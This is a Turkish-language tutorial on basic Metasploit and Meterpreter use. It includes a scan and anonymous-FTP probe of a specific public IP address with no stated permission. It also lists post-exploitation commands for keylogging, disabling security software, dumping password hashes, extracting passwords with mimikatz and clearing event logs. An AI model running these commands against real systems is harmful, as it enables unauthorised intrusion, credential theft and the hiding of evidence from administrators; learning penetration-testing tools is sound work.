Kali Linux Metasploit Kullanimi

Selamun Aleyküm ...

TEMEL METASPLOİT KULLANİMİ

HAKKİNDA

Metasploit Rapid7 Firmasinin Çok Önemli Bir Güvenlik Yazilimidir. Metasploit, Güvenlik Açıkları Hakkında Bilgi Verip Bu Açıklara Sızmaya Yardımcı Olan Bir Yazilimidir..  Ruby İle Yazilmiş Olan İçerisinde Exploitler, Payloadlar, Auxilliary'ler Ve Encoderlerin Buludunduğu Frameworkdur.

Veritabani Olarak Postgresql Kullanmaktadir. Kali Linux İçerisinde Hazır Kurulu Olarak Gelmektedir.
Terminalde Msfconsole Yazarak Komut Satirinda Ve Grafiksel Olarak Armitage İle Kullanılabilir.
Metasploit İçinde Nmap Taramasıda Yapılabilmektedir.

TERİMLER : 

Vulnerability: Türkçede Zayiflik Anlamina Gelen Sistemde Bulunan Açıklıktir.

Auxiliary: Sizma Öncesi Sistem Hakkinda Bilgi Toplamak İçin Bulunan Ek Modüller.

Exploit : Türkçesi Sömürmek Olan Sistem Açıklığından Faydalanarak Sisteme Sizmamizi Sağlayan Bileşendir.

Payload : Sisteme Sizdiktan Sonra Sistemde İstediklerimizi Yapmamizi Sağlayan Bileşendir.

Shellcode: Exploitin İçinde Bulunan Zararli Kod Parçalaridir.

Encoder: Exploiti Antivirüs, IDS, IPS, Ve Firewall'dan Geçiren Bileşendir.

GİRİŞ : 
İlk Olarak Terminal Açıp :
service postgresql start Yazarak Postgresql Veritabanini Başlatıyoruz.
msfconsole Yazarak Metasploitimizi Açıyoruz.


Help Komutu İle Metasploitin Tüm Komutlarını Ve Parametreleri Açıklamariyla Birlikte Görebiliriz Ama İngiliççe.



Search: Search Komutu Aranan Exploit, Payloads, Cve Numarasi Yada Genel Bi İfade İle Kullanılır.

Show Komutu : İstenilen Bileşenleri Listeleyip Görmemizi Sağlar.

Show Exploits: Metasploit Üzerindeki Tüm Exploitleri Gösterir.

Show Paylods: Metasploit Üzerindeki Tüm Payloadslari Gösterir.

Show Targets : Bulunan Target (Hedef)leri Gösterir.

Show Options : Exploit Yada Payloadin Tüm Ayarlarini Gösterir.

Use Komutu : İstenilen Exploiti Payloadı Seçmek İçin Kullanilir

set Komutu : Bir Değişkene Değer Aktarmak İçin Kullanilir.
Örnek : set RHOSTS Kurban İp Adresi
set LHOST Kendi İp Adresimiz

setg Komutu: Değişkenlere Global Olarak Değer Atar. Bir Başka Bi Exploit Yada Payload'ta O Ayarlar İçin Tekrar Değer Girmeniz Gerekmez.
Örnek : set RHOSTS Kurban İp Adresi'ne Global Değer Atar
set LHOST Kendi İp Adresimiz'e Global Değer Atar

Unset Komutu : Değişkene Atanan Değerleri İptal Eder.
unset RHOST Hedef İp Adresini İptal Eder
unset LHOST Local İp Adresimizi İptal Eder

Exploit Ve Run Komutu : Eğer Bir Exploit Seçmiş Ve İstenilen Ayarlari Yaptıktan Sonra Exploit Diyerek Çalıştırılır. Eğer Bir Payload Seçmişsek İstenilen Ayarlari Girdikten Sonra Run Denir Ve Payload Çalişir.

Giriş Kısmında Nmap Taraması Yapabilecegindende Bahsetmiştim Bi Hedef Üzerinde Tarama Yapıp Metasploit Üzerinde Yukarıda Açıklamasını Yaptıgımız Parametrelerle Exploit Etmeye Çalışalım.

db_nmap -Ss -sV -top-ports 10 81.169.145.159
--sS : Syn Taramasi
-sV : Versiyon Bilgisi
-top-ports 10 = En Çok Kullanılan 10 Portu Tara

Açık Portlar Ve Versiyon Bilgileri Geldi.
Metasploitte Search ftp Komutunu Bı Aratalim Bakalım Ftp İle İlgili Neler Varmiş 

Gözüme Çarpan Ftp Anonymous Girişi Oldu Bı Test Edelim.
1. use auxiliary/scanner/ftp/anonymous Komutu İle Seçiyoruz
2. show options Komutuyla Anonymous Ftp Ayarlarına Bakıyoruz.
3. set FTPPASS anonymous Komutu İle Ftp Passwordu Belirtiyoruz
4 .set RHOST Hedef İp Adresi İle Hedef İpi Yazıyoruz
5. Tekrar Show Options Komutuyla Bakalım Ayarlarımız Değişmiş Mi ?
6.Ardından Exploit Yada Run Diyoruz.


Anon Giriş Yaptığı İçin Yetkiler Kısıtlı.

Bir Sistemde Exploit Çalıştirilip Meterpreter Satirina Düştükten Sonra Meterpreter Komutları Kullanılır, Meterpreter Metasploitin En Çok Kullanılan Payloadlarindan Biridir. Onlardan Bazılarını Yazacagım.

Sysinfo : Sistem Hakkinda Bilgi Verir.
getuid: Sisteme Hangi Yetkilerle Erişim Sağladıgimizi Verir.
getpid: Sistem PID Numarasini Getirir.
ipconfig -a : Sistem Network Bilgilerini Verir.
run checkvm: Hedef Makinanin Sanal Makina Olup Olmadığına Bakar.
run keylogrecorder: Hedef Sistemde Keylogger Başlatir.
run getgui -e : Hedef Sistemde RDP (Remote Desktop Protokol) Açar.
run getcountermeasure: Hedef Sistemdeki Güvenlik Programlarini Devre Dişi Kılar.
backgraund: Aktif Oturumu Arka Plana Alır.
ps: Süreçleri Gösterir.
kill PID : PID Numarali Süreci Öldürür.
download: Hedeften Dosya İndirmek İçin Kullanilir.
migrate: Güvenilir Bir Process'e Geçiş İçin Yapmak İçin Kullanilir.
hashdump: Sistem Üzerinden Bulunan Parola Dumplarini Çeker.
shell: Hedef Sistemin Komut Satirina Geçmemize Yarar.
load mimikatz: Sisteme Mimikatz Yüklenir.
mimikatz_command -f sekurlsa::searchPasswords: Bellekteki Şifreleri Getirir.
clearev: Event Loglarini Temizler.
run event_manager -c : Tüm EventLoglarini Silmenizi Sağlar.

Bi Çok Meterpreter Komutu Var Bunlardan Çok Kullanılanları İşinize Yarayacak Olanlara Değinmeye Çaliştim.

Umarim Anlaşılir Bi Döküman Olmuştur Farkli Kaynaklardan Sizler İçin Derledim Topladim

Selametle TrazeR Sunar //

Share
Tepkiler: 
Uyari: Telif hakkı tamamen kaynağa aittir. Bu konuyla ilgili bir sorun varsa, burada bizimle iletişime geçebilirsiniz. Contact.

EN SON MAKALELER

Yorum Gönder